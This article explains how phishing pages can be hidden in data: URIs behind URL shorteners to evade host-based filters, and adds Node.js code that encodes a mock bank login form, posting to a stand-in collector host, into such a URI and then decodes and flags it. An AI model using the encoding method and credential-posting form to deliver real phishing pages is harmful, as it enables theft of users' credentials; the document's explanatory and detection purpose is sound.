Phishing is an attack in which criminals build sites that imitate those of banks, e-commerce shops and the like, and by passing them off as the legitimate sites trick unwary users into entering personal information, credit card details and similar data. The main hurdle these criminals face is finding a server to host such a site and fooling as many users as possible before hosting companies and law enforcement take it down.
A new paper shows that a malicious web page can instead be stored in a data URI (Uniform Resource Identifier): the entire page's code is packed into a single string, and a browser pointed at that string unpacks the payload and renders it as a page, with no web server involved at all.
Until recently, stuffing a web page into a URI would have raised suspicion because of the size of the resulting string, which is very long in most cases. With the advent of URL shortening services, however, that long URI can hide behind a link of just a few characters, which can then be shared through social networking sites, file sharing sites, email and so on.
This is where it gets dangerous. In his paper, Phishing by data URI [PDF], Henning Klevjer claims that with this method he was able to load the pages successfully in Firefox and Opera; it failed in Google Chrome and Internet Explorer. Whether the trick works therefore depends on the browser and on the context in which the link is opened, and Chrome and Firefox later moved to block top-level navigation to data: URLs altogether while still allowing them for embedded resources such as images and iframes.
The method also gets around defenses such as web filtering: there is no hosting server or domain to blacklist, and the page is never fetched from a server, so URL reputation and host-based filters have nothing to match on. Sophos notes that criminals may also stuff a malicious Java applet into a data URI, which is particularly dangerous in the wake of recent Java vulnerabilities.
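To make the mechanism and the filtering problem concrete, here is an added example (not code from Klevjer's paper, Sophos or this article) in Node.js. It packs a constructed, harmless login page into a base64 data: URI the way the paper describes, then parses such a URI back and flags the traits a mail or web filter would have to look for in the decoded body, since the URI itself has no host to match against. The page content, the `collector.example.invalid` form target and the heuristic names are all assumptions made up for the example.

```javascript
// Added example, not from the original article: build a data: URI that
// carries an entire HTML page, then decode one and apply filter heuristics.

// Constructed sample page (benign); mimics a bank login form that posts to
// a hypothetical attacker-controlled host.
const SAMPLE_PAGE = `<html><head><title>Example Bank - Sign in</title></head>
<body><form action="https://collector.example.invalid/grab" method="post">
<input name="user"><input name="pass" type="password"><button>Login</button>
</form></body></html>`;

// Pack a page as data:<mediatype>;charset=utf-8;base64,<payload>.
function toDataUri(html, mediaType = "text/html") {
  const b64 = Buffer.from(html, "utf8").toString("base64");
  return `data:${mediaType};charset=utf-8;base64,${b64}`;
}

// Parse a data: URI per RFC 2397: data:[<mediatype>][;base64],<data>.
// Returns null if the string is not a data: URI.
function parseDataUri(uri) {
  const m = /^data:([^,]*?)(;base64)?,(.*)$/s.exec(uri);
  if (!m) return null;
  const params = m[1].split(";").filter(Boolean);
  // RFC 2397 default when no media type is given is text/plain.
  const mediaType =
    params.length && !params[0].includes("=") ? params[0].toLowerCase() : "text/plain";
  const isBase64 = Boolean(m[2]);
  let body;
  if (isBase64) {
    body = Buffer.from(m[3], "base64").toString("utf8");
  } else {
    try {
      body = decodeURIComponent(m[3]);
    } catch (e) {
      body = m[3]; // malformed percent-encoding: keep the raw text
    }
  }
  return { mediaType, isBase64, body };
}

// Heuristics a filter can apply once it has the decoded body. A host-based
// filter sees no host at all: new URL(dataUri).hostname is the empty string.
function assessDataUri(uri) {
  const parsed = parseDataUri(uri);
  if (!parsed) return { isDataUri: false, host: null, reasons: [] };
  const reasons = [];
  if (parsed.mediaType === "text/html") reasons.push("html-document-in-uri");
  if (/<input[^>]+type\s*=\s*["']?password/i.test(parsed.body)) reasons.push("password-field");
  // Where would the credentials go? The form action is the real destination.
  const action = /<form[^>]+action\s*=\s*["']?([^"'\s>]+)/i.exec(parsed.body);
  if (action && /^https?:\/\//i.test(action[1])) {
    reasons.push("form-posts-to:" + new URL(action[1]).hostname);
  }
  // An embedded Java applet is the other payload the article warns about.
  if (/<applet\b|application\/x-java-applet|\.jar\b/i.test(parsed.body)) reasons.push("java-applet");
  return {
    isDataUri: true,
    host: new URL(uri).hostname, // "" for data: URIs
    mediaType: parsed.mediaType,
    isBase64: parsed.isBase64,
    reasons,
  };
}

// Stand-alone run: encode the sample page and show what a filter would see.
console.log(JSON.stringify(assessDataUri(toDataUri(SAMPLE_PAGE)), null, 2));
```

The decoded body, not the link, is what carries the evidence; a filter that only inspects URL hosts or fetches the target for a reputation lookup never sees the form or the applet, which is exactly why the technique slips past host-based blocking. The same decoding step applies behind a URL shortener once the redirect target has been resolved.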